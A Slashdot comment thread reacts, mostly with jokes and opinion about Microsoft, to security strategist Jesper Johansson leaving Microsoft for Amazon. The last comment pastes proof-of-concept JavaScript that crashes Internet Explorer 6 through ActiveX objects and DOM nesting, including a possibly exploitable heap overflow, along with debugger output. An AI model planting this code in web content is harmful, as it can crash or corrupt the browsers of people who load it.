MS Security Guru Leaves for Amazon.com

Zonk posted more than 8 years ago | from the leaving-is-hard-to-do dept.

Rocky Mann writes "Jesper Johansson, a security guru for Microsoft, is leaving the company to join Amazon.com. Johansson served for some five years as a 'senior security strategist', and is considered one of the world's leading experts on how to protect installations of Windows." From the article: "Johansson is also an advocate for the use of safe-passwords techniques in the enterprise. At the height of the WMF zero-day attacks earlier in 2006, Johansson offered measured advice on the use of unofficial patches and he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely."

Great Quote (4, Insightful)

gooman (709147) | more than 8 years ago | (#15807468)

...he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely.

Kind of says it all doesn't it.

Re:Great Quote (1)

donaggie03 (769758) | more than 8 years ago | (#15807527)

So there's this word that basically means "a phrase using words that are opposites or otherwise incompatible." I can't think of what that word is at the moment, but I think Microsoft Security would be a good example of that. The end.

Re:Great Quote (0)

Anonymous Coward | more than 8 years ago | (#15807545)

oxymoron

I think you mean otherwise compatible

Re:Great Quote (1)

ShieldW0lf (601553) | more than 8 years ago | (#15807555)

Johansson served for some five years as a 'senior security strategist'

He's #1 in securing windows machines. He carries very sharp scissors in his back pocket.

Re:Great Quote (1)

Skevin (16048) | more than 8 years ago | (#15807793)

An oxymoron.

Solomon Chang

Re:Great Quote (0)

Anonymous Coward | more than 8 years ago | (#15807562)

how: Buy sco 'licences' ? or the Darl tax ?

Re:Great Quote (0)

Anonymous Coward | more than 8 years ago | (#15807804)

It's amazing how well this makes it sound like the issues were the user's fault. Please, when you mess up, at least accept responsibility.

Re:Great Quote (1)

LinuxGeek (6139) | more than 8 years ago | (#15808072)

Yeah, I imagine that he has accumulated enough frequent flyer miles to actually leave the Milky Way.

Re:Great Quote (1)

Shag (3737) | more than 8 years ago | (#15809728)

...he was constantly on the move, traveling around the world to help customers figure out how to use Microsoft's products securely.

Sisyphus had it easy in comparison to that.

Steve Ballmer (5, Funny)

Yvan256 (722131) | more than 8 years ago | (#15807473)

At some point in the conversation Mr. Ballmer said: "Just tell me it's not Amazon." I told him it was Amazon.

At that point, Mr. Ballmer picked up a chair and threw it across the room hitting a table in his office. Mr. Ballmer then said: "I'm going to fucking bury that company, I have done it before, and I will do it again. I'm going to fucking kill Amazon."

Thereafter, Mr. Ballmer resumed trying to persuade me to stay....Among other things, Mr. Ballmer told me that "Amazon is not a real company. It's a library."

Re:Steve Ballmer (2, Funny)

moria (829831) | more than 8 years ago | (#15809792)

Is the Ballmer the Chairman?

Re:Steve Ballmer (0)

Anonymous Coward | more than 8 years ago | (#15811098)

Well, if he had any chairs left, he might have been.

Why are people who leave microsoft relevant news? (4, Insightful)

Anonymous Coward | more than 8 years ago | (#15807482)

I can see how Scoble and Gates leaving MS should make slashdot, but this is just random fluff. Slashdot loves reporting that (not really) important people are leaving Microsoft for Google, or apparently Amazon.

Do we get to also see the random people who leave Google and Amazon.com? Mod me down if you like, but I don't really see how this is relevant news.

Re:Why are people who leave microsoft relevant new (-1, Offtopic)

mustafap (452510) | more than 8 years ago | (#15807494)

>Mod me down if you like,

Modded down. Thanks for asking.

Re:Why are people who leave microsoft relevant new (2, Insightful)

justsomebody (525308) | more than 8 years ago | (#15807540)

You only have three options:
- you think you've entered some SeriousGeekSanctuary.com??? You suddenly realize "it is a /.". God, that would be a red pill for you
- feed your kitten and pretend nothing happened, go to sleep and hope it will go away. No pill and you wake up hungry, while /. still exists in its current form in the morning
- go with the rest of us and take the /. blue pill, code for nothing and post bull for the rest of the day

But here it is "IT IS A SLASHDOT, WHADA'YA EXPECT???"

p.s. since you were agreeing with being modded down, your wish came true. I on the other hand agree on being modded up.

Re:Why are people who leave microsoft relevant new (1)

tomstdenis (446163) | more than 8 years ago | (#15807556)

Microsoft's Demise: See Titanic.
Titanic: 2nd worst civilian disaster next to the demise of Microsoft.

Tom

Re:Why are people who leave microsoft relevant new (1)

Stormwatch (703920) | more than 8 years ago | (#15807603)

Titanic: 2nd worst civilian disaster next to Microsoft.
There, I fixed it for you.

Breaking News (3, Interesting)

quokkapox (847798) | more than 8 years ago | (#15807598)

Any tech guru leaving Google, Yahoo!, Amazon, YouTube, or any other innovative company, to go work for Microsoft, *would* be breaking news. Hate to say it, but it ain't happenin'. Somebody, prove me wrong.

Re:Breaking News (4, Informative)

EvanED (569694) | more than 8 years ago | (#15807910)

Does the Sysinternals guy count?

Re:Breaking News (1)

KwKSilver (857599) | more than 8 years ago | (#15808004)

His company got swallowed whole by MS. Too bad, I rather trusted it. Not now, though.

Re:Breaking News (1)

EvanED (569694) | more than 8 years ago | (#15808121)

I have a friend at MS now as an intern who actually loves the Sysinternals tools who says the developers there won't let MS do anything to kill them. So don't despair quite yet.

Re:Breaking News (1)

Jah-Wren Ryel (80510) | more than 8 years ago | (#15808269)

Sounds just like what Ben & Jerry were saying right after they were bought out by Unilever.

Re:Why are people who leave microsoft relevant new (1)

cmacb (547347) | more than 8 years ago | (#15808801)

"Mod me down if you like, but I don't really see how this is relevant news."

It was news to me that Microsoft even HAD a "security strategist".

I wonder what he did all day. Review the 10 year backlog of e-mail warning that active scripting might be a gaping security hole?

Re:Why are people who leave microsoft relevant new (1)

someone1234 (830754) | more than 8 years ago | (#15810501)

By your logic, anyone leaving M$ is unimportant. Maybe they even cease to exist.

Re:Why are people who leave microsoft relevant new (0)

Anonymous Coward | more than 8 years ago | (#15813555)

It's news to me.
I can't stand it when people act like they were forced to read a news article. Even worse, that they act like they were forced to waste their time commenting on it.
GET A LIFE

And let me guess.... (3, Funny)

LittleBigScript (618162) | more than 8 years ago | (#15807489)

...he signed a Non-Compete Agreement with Microsoft so he's working as front door security.

Re:And let me guess.... (0)

Anonymous Coward | more than 8 years ago | (#15809118)

noncompetes generally aren't enforced in washington state, so it's probably not a big deal.

Re:And let me guess.... (0)

Anonymous Coward | more than 8 years ago | (#15809298)

Washington state is limiting your right to contract? I would be outraged!

(there are two ways to look at everything ... and in this case, not enforcing non-compete agreements would be a really really bad idea, and probably not at all the reality)

Could be. (1)

twitter (104583) | more than 8 years ago | (#15809299)

... he signed a Non-Compete Agreement with Microsoft so he's working as front door security.

If so, I'll bet he's looking forward to a job that's possible.

Re:And let me guess.... (1)

Geminii (954348) | more than 8 years ago | (#15810133)

Dunno, from the quoted text it sounds like that's what he was doing at Microsoft...

Amazon? (4, Funny)

justsomebody (525308) | more than 8 years ago | (#15807495)

Thank god it is not Google. MS chairs will probably thank him publicly.

Re:Amazon? (4, Funny)

jrumney (197329) | more than 8 years ago | (#15807613)

Thank god it is not Google. MS chairs will probably thank him publicly.

MS bookcases on the other hand, are quivering in fear.

Yikes! Time to close... (4, Funny)

dpbsmith (263124) | more than 8 years ago | (#15807496)

...my Amazon account.

Re:Yikes! Time to close... (1)

MillionthMonkey (240664) | more than 8 years ago | (#15807543)

I can't wait to change my password to the empty string! Who can remember those things!

Must be... (2, Funny)

Shook18 (878947) | more than 8 years ago | (#15807511)

the smartest man alive! "...and is considered one of the world's leading experts on how to protect installations of Windows."

Re:Must be... (2, Funny)

MooseByte (751829) | more than 8 years ago | (#15807640)

I swear when I first read that, I parsed it as "one of the world's leading experts on how to protect installations from Windows."

And it still made perfect sense (codebase problems and all).

So? (0)

Anonymous Coward | more than 8 years ago | (#15807519)

Microsoft has quite a few Gurus.. is there a reason that this one guy is news?

MS Security? (0, Troll)

Anonymous Coward | more than 8 years ago | (#15807522)

Isn't that an oxymoron... kinda like military intelligence?

Re:MS Security? (1)

crashelite (882844) | more than 8 years ago | (#15807619)

to top it off he is a guru too... damn didn't know ms had either of them... last time i checked... hold on gotta use my dictionary... "(in Hinduism and Buddhism) a spiritual teacher, esp. one who imparts initiation." humm MS campus has hazing? i thought that was against campus rules... oh well that must be why he is going to amazon... they don't have a campus... he can impart in initiations all he wants.

Re:MS Security? (2, Insightful)

bcat24 (914105) | more than 8 years ago | (#15807621)

Or worse, "insightful Slashdot post". *ducks*

Re:MS Security? (1)

EvanED (569694) | more than 8 years ago | (#15807900)

Someone needs to mod the parent insightful, just to be ironic.

Re:MS Security? (0)

Anonymous Coward | more than 8 years ago | (#15809042)

And it actually happened. LOL, this is why I love Slashdot.

Like the chastity expert at the chicken ranch! (1)

BroncoInCalifornia (605476) | more than 8 years ago | (#15808803)

I did not know Microsoft had a security expert!

Re:Like the chastity expert at the chicken ranch! (1)

Geminii (954348) | more than 8 years ago | (#15810148)

Well someone there had to prevent anyone else reading books on security. It's a full-time job!

Wait, I know this one... (0, Troll)

AlXtreme (223728) | more than 8 years ago | (#15807524)

...to help customers figure out how to use Microsoft's products securely.
By keeping their computers switched off?

Thank you, thank you. I'll be here all night, please tip the waiter...

Re:Wait, I know this one... (-1)

Anonymous Coward | more than 8 years ago | (#15807584)

*throws fruit*

"You suck, faggot!"

Re:Wait, I know this one... (0)

Anonymous Coward | more than 8 years ago | (#15808207)

Didn't deserve the troll mod. Guess they wanted a chair joke.

omg sooo funny (1, Redundant)

atarione (601740) | more than 8 years ago | (#15807530)

chair jokes? still funny after what 2yrs I do not not remember?

Non Compete jokes oh man hold on let me get my pills you're killing me.

and a bunch of "secure windows" isn't that an oxymoron jokes...

no really it is very funny.

Re:omg sooo funny (1)

Reverend528 (585549) | more than 8 years ago | (#15808045)

things to do: 1.read slashdot..done 2.????? 3. Profits

Please impart your wisdom on us, he who has mastered the art of comedy.

If those jokes really bother you... (0)

Anonymous Coward | more than 8 years ago | (#15808154)

...you must be new here ;)

I met this guy (4, Interesting)

DnemoniX (31461) | more than 8 years ago | (#15807535)

I attended a small security lecture with about 25 people, he was the presenter. He walked through some real time hacks against Microsoft products that he had running in VPC. Nothing too stunning for me, but most of the people there had no clue about security so they were all blown away. I didn't see anything special. One thing of note that amused me, was the bumper sticker on his laptop that read "My other box is your Linux box". I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...

If you run his name on Amazon you will find his book, which is really very good if you are a Windows Server Admin and are new to the security game.

Re:I met this guy (1)

Yvan256 (722131) | more than 8 years ago | (#15807547)

"My other box is a 10,000 node zombie cluster of Windows machines"

Good one, I wonder if ThinkGeek would make such bumper stickers...

My poor experience with JJ talks (1)

muzzmac (554127) | more than 8 years ago | (#15809016)

I went to Jesper's presentation at Auscert in 2005 where he came out with the stunning "write down your passwords" revelation. (Previously espoused by Bruce Schneier years ago.)

His talk was an hour of how to jam as many funny pictures into a talk and attempt to get "in" with the geek crowd by poking fun at the security establishment.

It was kind of pathetic.

He then went on to attend a Thor Larholm presentation and attack Thor at the end of it. It was stupid and untidy. I thought Thor handled it well. Jesper lost all respect from me @ that point.

BTW the attack was basically Thor going through some old .JPG processing vulnerability in windows and examining it. He stated at one point this can't have been reviewed as a very basic buffer overflow was missed.

Jesper then piped up and stated it was reviewed "because I reviewed it." Blah blah blah.

Jesper and another MS Security manager (I think there are about 700 managers personally responsible for security @ Microsoft.) continued the attack making themselves look rather silly and Thor look very balanced and well mannered.

Cocky for such a loser record. (1)

twitter (104583) | more than 8 years ago | (#15809290)

"My other box is your Linux box"

That's a stupid thing for him to say. It shows his malicious intentions and his failure to carry through.

80% of the world's spam comes from security problems in his platform. This guy's work is either incompetent or hampered by others. Blaming it on his users is not good enough while Mac, Linux and Sun users are blissfully unaware of the Windoze swamp.

To date there are no such problems with free software, no worms, no trojans, ad servers, nothing, naada, zip. Sure, that dick might be able to root my particular box if he tried hard enough. So what? I can clean it up in twenty minutes and I've got enough redundancy and back ups to not even notice. Unlike the pay per play Windoze world, I can have live backups on multiple machines without losing my shirt.

All that silly bumper sticker shows is his intent to break something that works better than M$ junk. So far all efforts in that direction have failed. Banks, search engines and other high profile chair targets continue working as usual, unless some M$ net storm messes things up.

I said that I couldn't fit "My other box is a 10,000 node zombie cluster of Windows machines" on a bumper sticker....he chuckled...

He was probably thinking, "My Windows bot net is bigger than yours. "

Re:I met this guy (0)

Anonymous Coward | more than 8 years ago | (#15810723)

I attended that same security lecture, and Jesper was the one guy who added nothing of real value. I couldn't help thinking that,

- a) he was a complete egomaniac, who loved nothing more than to hear himself talk, and he really did think he was the bomb;

- b) he was a complete dick, and for being a supposed professional, was completely low-class, hurling insults and such to try and impress us;

- c) very typical Microsoft... didn't know the facts, didn't know technology, didn't understand that the Linux and BSD systems of the world have such a better track record than what he was telling us, didn't have a clue about anything not invented by Microsoft.

In a Q/A session at the end of that summit, I asked Jesper why a systems administrator would want to use 100% Microsoft systems, essentially why would anyone rely on a "homogenous" environment, and put all their eggs in one basket, security-wise. (Referring to the study about heterogenous environments being more secure.)

His answer was about how much easier it was to administer servers if they were all Windows. Huh? Since when does "easy to administer" have anything to do with security? (Oh right, in Windows-land it does.)

I followed up that reply with the comment that the studies were not about systems being easy to administer but were about reducing the number of and the effect of 0-day sploits since a heterogenous system would use a variety of OS's. He continued on, twisting facts, twisting truth, and eventually made it sound as if it was the Systems Administrators that introduced all the world's security holes, and that if Microsoft could just introduce yet another control panel, and everyone would use it, then all the Windows servers would be secure. HAHAHAHAHAHAHHAAHAHA I still laugh out loud thinking about his ignorance about this.

I love how Microsoft produces products with so many buffer overflows and protocols with gaping holes in it, and then blames the customer's system administrators because the systems weren't locked down.

Like I said, he's typical Microsoft, arrogant and stupidly factually incorrect.

One Liners (1, Interesting)

Anonymous Coward | more than 8 years ago | (#15807542)

Just moving from one marketing gig to another.

He was done securing vista and there just wasn't anything challenging left at Microsoft for him to work on.

He's moving to Amazon to implement Trustworthy One-Clicking(TM).

His real reason for leaving: he's looking for the one, the only one that's built like an Amazon...and he doesn't want people to buy their books from a brick house.

Hey, does Amazon sell office chairs?

Re:One Liners (1)

Effugas (2378) | more than 8 years ago | (#15807770)

OK, Trustworthy One-Clicking is probably the funniest concept I've seen in a while. AC FTW.

Re:One Liners (1)

Incoherent07 (695470) | more than 8 years ago | (#15807868)

Hey, does Amazon sell office chairs?

Yes. [amazon.com]

Well... (1)

TouchOfRed (785130) | more than 8 years ago | (#15807546)

I guess when you've thrown enough money at the problem and it still hasn't been solved, the next logical thing would be chairs. Either that or developers.

maybe this is just me (1, Interesting)

Anonymous Coward | more than 8 years ago | (#15807566)

but it seems that while protecting Amazon's internal network, along with the protocol to customers (which presumably uses SSL), is admittedly a huge task, one can rely heavily on firewalls, server configurations, protocols, and physical security policies that can be standardized throughout the company.

While the ongoing task of securing hundreds of millions of desktops and servers owned and operated at customer sites is orders of magnitude more formidable. Maybe he didn't want to be around when the Vista hit the fan?

If I were Ballmer (1)

mnmn (145599) | more than 8 years ago | (#15807575)

If I were Ballmer I would try to hire Theo de Raadt to replace him.

And if I were de Raadt, I'd reject the offer unless Microsoft opensources win32.

And if I were the customer I would not buy Windows at all.

Oh wait...

Re:If I were Ballmer (0)

Anonymous Coward | more than 8 years ago | (#15807630)

I've worked with Theo, and I've worked with JesperJo. Trust me, Jesper has it all over Theo. Not to mention the fact that Jesper doesn't provoke violence.

MS Security Guru Leaves for Amazon.com (0)

Rik Sweeney (471717) | more than 8 years ago | (#15807607)

Bad luck Amazon!

Any other M$ joke cliches? (3, Funny)

kimvette (919543) | more than 8 years ago | (#15807612)

Cliche M$ humor attempt #1:

(#1a)
Amazon? Amazon? WTF?

I can imagine it now:

Some random M$: Exect #1

Amazon has enjoyed a moderate amount of success, therefore online book, CD, and video sales is obviously Microsoft's space. How dare they take food off of Microsoft's table by doing business in an industry kinda-sorta-maybe related to anything we at Microsoft do? And what the hell, now they're stealing our talent to do it? We own that space, we're in that space (maybe. somehow, in a future. Maybe we'll buy them out! Hey wait a second, we have a division called Microsoft Press, don't we? I think we can sue Mr. Johansson and put a stop to our competitors' stealing our employee!

Ballmer:

I'm going to F***ING KILL AMAZON! I'LL KILL THEM AND BURY THEM! I've done it before!
(meanwhile, Microsoft's new AI-equipped motorized chairs, which have been provided due to Ballmer's costing the company millions in damaged chairs and the need to avoid these recurring losses, detect Ballmer's impending annurism quickly roll out of the room)

(#1b)Bill Gates:

Meh. I've had my day of being a right ass. I couldn't be bothered being a hater any more. Besides, I'm quitting soon. *donates another $10bil to save the children to appease conscience*

Cliche M$ humor attempt #2:

A Microsoft Security expert? You mean, HE'S the reason Microsoft Windows is so "secure?"
Just what the hell is Amazon thinking?

(I kid, on both counts)

Re:Any other M$ joke cliches? (1)

Ohreally_factor (593551) | more than 8 years ago | (#15808174)

Dear Diary,

Finally, I'm leaving this stinking company for another where I might have a chance to actually use my expertise, instead of flying all over creation putting on dog-and-pony shows and doing damage control! I feel like a rat fleeing a sinking ship, but if the Chief Rat has scurried off, why should I feel any remorse? Besides, I was almost hit by a chair two weeks ago. Enough is enough!

Yours truly,

Jesper

Re:Any other M$ joke cliches? (1)

kimvette (919543) | more than 8 years ago | (#15808259)

before some typist-nazi calls me on it:

s/exect/exec/
s/annurism quickly/annurism and quickly/

Beet u 2 it, so their!
Oops, they're I go again, er, I mean, oops, I did it again!

Beat ya to it typo nazis, so there! ;)

Microsoft is under a major crisis. (4, Insightful)

Marcos Eliziario (969923) | more than 8 years ago | (#15807615)

Microsoft no longer has a coherent vision or a clear strategy. They waste their time trying to attack on several fronts, and in the meantime, their core is abandoned. Vista could have been a technological breakthrough, but they let this opportunity slip. Instead of trying to innovate, they try to emulate others and have been failing miserably. In the past, if only rumor about Microsoft developing a MsPod emerged, this would have a clear effect on Apple stocks. Nowadays, they can formally announce they are working in it and people will only nod their heads, because they are increasingly losing credibility. They spent millions with IE, had successive legal problems because of it, not to mention the security problems, and still they can't face the fact that they could profit from internet making their OS better. Cisco makes money selling routers, why Microsoft can't see that they can profit from the internet by having a rock solid, fast and easy-to-use OS? Why do they think that they need to "kill" google, or "kill" iPod on their own arenas to survive? Instead they should have invested all this money making their core business stronger, by making their OS the best OS for developers and users alike, by making people "wanting" to use Windows instead of people "Having" to run windows. After that they could even afford the luxury of competing with the iPod or with Google, but not the way they are doing now.

Re:Microsoft is under a major crisis. (1)

Marcos Eliziario (969923) | more than 8 years ago | (#15807644)

(I've forgotten to finish my argument on the last post. Sorry.) So, my point is that all those departures are a clear signal of that crisis. Surely they are not leaving because of the money, but they are leaving because they had enough of that crisis and they clearly see where the company is heading, and they don't like what they see.

Re:Microsoft is under a major crisis. (2, Insightful)

Decaff (42676) | more than 8 years ago | (#15807679)

Microsoft no longer has a coherent vision or a clear strategy. They waste their time trying to attack on several fronts, and in the meantime, their core is abandoned

I have been using Microsoft products since the 70s. Have they ever had a core or coherent IT strategy?

As far as I can tell, their strategy is purely business-based. It is to make popular products with as little effort on secondary issues (such as security) as possible. They have been focussing on security in recent years not because of any core belief, but because lack of it was starting to seriously threaten sales. All of their products have involved operating system tie-ins since the start. It is a perfectly reasonable sales model (except for when it is used illegally, as with the monopoly issue).

Microsoft has a clear strategy, but if you are looking for it in terms of IT you are looking in the wrong place.

Re:Microsoft is under a major crisis. (2, Insightful)

Marcos Eliziario (969923) | more than 8 years ago | (#15807745)

No. I mean in terms of business itself. Business is about generating money from the resources you have in the best way you can, and also, this has to be sustainable over time and has to generate more value for the money than other options, or at least give your stakeholders that impression. Do you know the kind of guy/girl that is intelligent, creative, but never finishes what he/she starts? Microsoft looks just like that guy. They start a lot of initiatives, make up grandiose strategies (do you remember when everything had .NET in its name, now it's time for "Windows Live";-) but they clearly lack the details and soon reality forces them to step back, and all the money they spent is lost forever. They are in it for the money, of course, and that's right, but looks like they don't really know how to invest their money, they look like a Third World dictatorship that after the discovery of vast reserves of Oil in their subsoil, start building giant stadiums, try to build nuclear bombs and waste all the newly gained money with useless things for their people, just because they never had a coherent and intelligent vision of how to work with all that money. Microsoft has been spoiled by market analysts that dumbly appraised every stupid move of them, just because those analysts thought that Microsoft could never get wrong. This has diminished their ability to think strategically, and all the money they had just made it worse for the dissident voices to be heard. They got intoxicated with their success, and what we see now is just the result of it.

Re:Microsoft is under a major crisis. (2, Insightful)

Decaff (42676) | more than 8 years ago | (#15807834)

I think you have written a very good summary, but I think you have missed something. The reason why this seems to be starting to fail is because the computing industry (at least the area where they are trying to make money) has stopped growing and changing as rapidly as it used to. These are not the early days of the PC or Windows when users are impressed by each new product. People are used to Windows, and no amount of publicity for Vista will change the fact that it is yet another version of the same old product. I would also imagine that Microsoft expected 5 or 6GHz processors around now to back up their new releases. Microsoft has previously had new markets to expand into, but now they are penned in. Their server sales market share has been stagnant for years, and a large number of Microsoft servers run... Java! Same with the mobile phone OS market. Attempts to use their desktop presence to expand into other markets have proved illegal. All around them, smaller companies are innovating. Microsoft have ridden on the coat-tails of an exponentially growing hardware market with ever-increasing processor speeds. Now that those markets are slowing, Microsoft seems to be finding it hard to adapt.

Thank you. (1)

Futurepower(R) (558542) | more than 8 years ago | (#15808364)

Thanks for your excellent discussion of the issues

Re:Microsoft is under a major crisis. (1)

Marcos Eliziario (969923) | more than 8 years ago | (#15809506)

I see your point, and I agree with it also, but I still think this is a part of the problem, and not the whole explanation. Surely the market has changed and things are different now from what they were some years ago. But why is their response so blind and erratic?
And that's where I think that my theory fits in.
For a comparison, look at Apple. Instead of trying to be everywhere, every time, they tried to do some few things well done. Instead of trying to compete with Google, or Yahoo, or whatever, they instead opted to fill a niche and to leverage their products. Look at iTMS and iPod, simple products, easy ideas, and an incremental approach, first music, then videos... What Microsoft would have done instead: Probably they would have a "vision" for digital media, overwhelmingly complex and extremely ambitious, that would cost a lot of money, and if they made a mistake, well... their new initiative would be tainted forever.
There are very interesting things being done at Microsoft, things like the work with Software Factories, the innovations in C# 3.0. Surely, development tools are not even profitable for Microsoft, but they have some fine brains working in it.
Do you know what is the problem? The idea that every company should concentrate its efforts on its weakness, instead of concentrating on its strong points. This is the recipe for failure.
Apple has seen its rebirth doing exactly the opposite. At a point where there were several doubts if Apple would be able to survive, they turned the table by concentrating their efforts where they were clearly good. Having not much money surely helped them to have so straightforward a vision, because they could not afford to lose.
Can you see, Microsoft has been wasting money trying to control the web, because someone told them that if they did it not, they would be swallowed. Some years later, it is Apple, who never seemed to care so much about the internet, that has a landmark online business with iTMS.
Microsoft should go more simple, take smaller steps and adopt incremental approaches to new business. Think about it like some kind of XP translated to business, something like eXtreme Management. Small steps, tests, listen to the feedback from customers and avoid by all means that stupid big upfront business strategy design. If they don't change, the smart guys will keep abandoning the ship.

Re:Microsoft is under a major crisis. (1)

Decaff (42676) | more than 8 years ago | (#15809671)

Microsoft should go more simple, take smaller steps and adopt incremental approaches to new business.

I think one of the problems with Microsoft is that they often do adopt incremental approaches, but in the wrong areas. I remember in the 90s (and even in the late 80s) waiting for Microsoft to produce a robust multi-tasking desktop operating system. It was so concerned about absolute backward compatibility that they held back, and did things very slowly and took decades to do this. On the other hand, they take risky steps where they need not. They have abandoned a huge community of developers by making .NET incompatible with VB6, but there was not much point in having a VM-based system like .NET unless you were going to provide portability, which .NET is not. They can innovate all they like with .NET, but as anyone who has used MS products for some time can tell you, there is no guarantee that they won't drop .NET in a few years in response to some new marketing strategy.

So, you are right - they seem to have an unplanned, incoherent, scatter-gun approach. Up till now, the occasional idea has worked, and they have managed to quickly change direction when it hasn't (as with OS/2 and Windows).

Re:Microsoft is under a major crisis. (1)

TaoPhoenix (980487) | more than 8 years ago | (#15809706)

Some good analysis here. I shall try to add some snips.

Microsoft *did* succeed in controlling the web - so well in fact, that all the Monopoly issues arose. The court cases discussed the near-monopoly of Windows itself. I am having trouble recalling the final results, but I think the effect was that Microsoft barely stayed within legal limits purely on the OS side, and only got in trouble with Bundling.

Paul Thurrott's little WGA escapade aside, I do rely on him to explain the fundamentals, and he did slip in a truly scary warning about Vista. (paraphrased) "Because of the inertia of decades of sloppy programming for windows, suddenly when programs are no longer able to write where they want, this will break thousands of programs". If this is really true, it *would* be the second of three strikes to seriously cripple Microsoft.

What exactly would happen if Microsoft completely went nova? Would there be the world's biggest renaissance of IT to switch the entire business world over? Unlike the Airline Bailouts, Microsoft already has large (illegal) amounts of money. If Vista tanks, after we all watch Return of the Jedi, the social effects would be nearly incalculable. (All for good ends, but a bumpy ride.)

Trying to read between the lines, the specs I see on Vista are "it does nothing well except MAYBE security". So this is a Slashdot story, because the Senior Security Strategist is leaving (I'm sure he had a job: "what the #$%^#$% do I do with legacy code? Which of three user bases do I want to royally piss off?") (Do the math: 'FIVE years'. That means he arrived post-XP ... and didn't see the completion of Vista. And I forget who, there's a lead product designer who is also retiring promptly upon the release of Vista.) Is there any chance they abused him so badly he said: "Oh yeah? I dare you to try to finish out a Beta that our lead reviewer says not to install!". Is it possible that by doing his part to BrainDrain Microsoft, he is expressing discontent? "Vista, the Security Version of Windows, without the Senior Security chief. I dare you to fix that glitch when ...."

--TaoPhoenix

Re:Microsoft is under a major crisis. (1)

Marcos Eliziario (969923) | more than 8 years ago | (#15809746)

Good point. Do you think that all those defections are the external symptom of Vista having turned into a Death March Project [Yourdon]? After reading your comment this was the first thing that came to my mind.

Re:Microsoft is under a major crisis. (1)

TaoPhoenix (980487) | more than 8 years ago | (#15810680)

I do not know. I consider myself warned, and am content to let actual dramas unfold in seven months.

Re:Microsoft is under a major crisis. (1)

TheSunborn (68004) | more than 8 years ago | (#15810837)

But Microsoft don't control the web at all. They don't run the majority of webservers or mail servers.

They do make the most used webbrowser, but they can't really use that for anything anymore. I have not seen an "internet explorer only" website on the public internet, within the last 12 months.

And having Internet Explorer does not help them sell other products. IIS for example is just as good (or bad) whether the client is using Internet Explorer, Mozilla, Firefox or SeaMonkey.

Now just sit back and watch... (2, Insightful)

Rodness (168429) | more than 8 years ago | (#15807625)

... as Amazon gets pwned for being completely insecure.

Honestly, I don't understand why people we've never heard of defecting from Microsoft is newsworthy anymore.

Open Season (1)

MECC (8478) | more than 8 years ago | (#15807629)

Looks like open season on Amazon...

Mom to Jesper: Don't run w/ scissors! (1)

10am-bedtime (11106) | more than 8 years ago | (#15807671)

Jesper to Mom: It's part of my job, Mom. I fly first class, snip people's ethernet cable, and they pay me well...

Amazon to Jesper: ...(so far).

BLOG: Im finally switching to Linux ....... (1, Interesting)

Anonymous Coward | more than 8 years ago | (#15807767)

AMAZON is 94% UNIX/LINUX shop

New Amazon slogan (1)

Frightening (976489) | more than 8 years ago | (#15807794)

AMAZON: Where groceries are better than Vista

Meh, who cares (1)

Gumber (17306) | more than 8 years ago | (#15807906)

I remember this guy, I ridiculed him heartily in my blog after he bitched about the way non-Microsoft people handled the WMF exploit.

A short review of Microsoft Security: (1)

Futurepower(R) (558542) | more than 8 years ago | (#15808136)

I don't know why he is leaving. Being a "Microsoft Security Guru" is apparently a job with no duties. See this movie: 144,000 known viruses for Microsoft operating systems. [apple.com]

It appears to me that Microsoft products are deliberately not secure. Because Microsoft has a temporary monopoly, Microsoft makes more money when its product is more defective.

One of the main purposes of Vista is to get people to buy new computers. Microsoft makes most of its money by selling to computer manufacturers, and Microsoft is able to do what they want, not what is good for the customers. That's the reason Microsoft doesn't fix the bugs in Internet Explorer. When computers become slow because of viruses and spyware, people usually buy a new computer.

If Microsoft cared about its customers, it would fix these bugs in Internet Explorer, and many others:

ADODB.Recordset Filter Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. The interesting thing about this bug is how the same property has to be set three different times to trigger the exception.

a = new ActiveXObject('ADODB.Recordset');
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = "AAAA" } catch(e) { }
try { a.Filter = 0x7ffffffe; } catch(e) { }

eax=001dbfdc ebx=02820e18 ecx=02821288
edx=028212a8 esi=02821288 edi=00000000
eip=4de194f7 esp=0013ade8 ebp=0013adf0
msado15!CSysString::operator=+0x12:
4de194f7 3907 cmp [edi],eax ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.


Internet.HHCtrl Image Property

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug is interesting because a small heap overflow occurs each time this property is set. The bug is difficult to detect unless heap verification has been enabled in the global debug flags for iexplore.exe. The demonstration below results in a possibly exploitable heap corruption after 128 or more iterations of the property set.

var a = new ActiveXObject("Internet.HHCtrl.1");
var b = unescape("XXXX");
while (b.length < 256) b += b;

for (var i=0; i<4096; i++) {
    a['Image'] = b + "";
}

eax=00030288 ebx=00030000 ecx=7ffdd000
edx=00030608 esi=58585850 edi=00000022
eip=7c911f52 esp=0013afcc ebp=0013b1ec
ntdll!RtlAllocateHeap+0x31b:
7c911f52 8a4605 mov al,[esi+0x5] ds:0023:58585855=??

This bug was reported to Microsoft on March 6th, 2006.


StructuredGraphicsControl SourceURL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug appears to be triggered by a call to URLOpenBlockingStream() with a NULL pointer referenced by the ppStream argument. The only way I found to trigger this bug is by creating the object through the ActiveXObject interface -- using the standard object/classid syntax (as described here [webdevelopersjournal.com] ) does not result in a crash.

var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';

eax=00000000 ebx=7726d35c ecx=02481f30
edx=0013b1a4 esi=00000000 edi=00000000
eip=772ba3bc esp=0013b18c ebp=0013b1b8
urlmon!CBaseBSCB::KickOffDownload+0x7a:
772ba3bc 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug was reported to Microsoft on March 6th, 2006.


Table.Frameset

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. This bug was found by Aviv Raff using the DOM-Hanoi [metasploit.com] fuzzer script. DOM-Hanoi works by building trees of every combination of elements up to the specified depth. An alternate PoC could use plain HTML instead of javascript.

var a = document.createElement('table');
var b = document.createElement('frameset');
a.appendChild(b);

eax=00000000 ebx=01884710 ecx=01886c60
edx=00000027 esi=0013aeb0 edi=01884730
eip=7dc995ad esp=0013ae88 ebp=0013ae9c6
mshtml!CTreePos::NextTreePos+0x23:
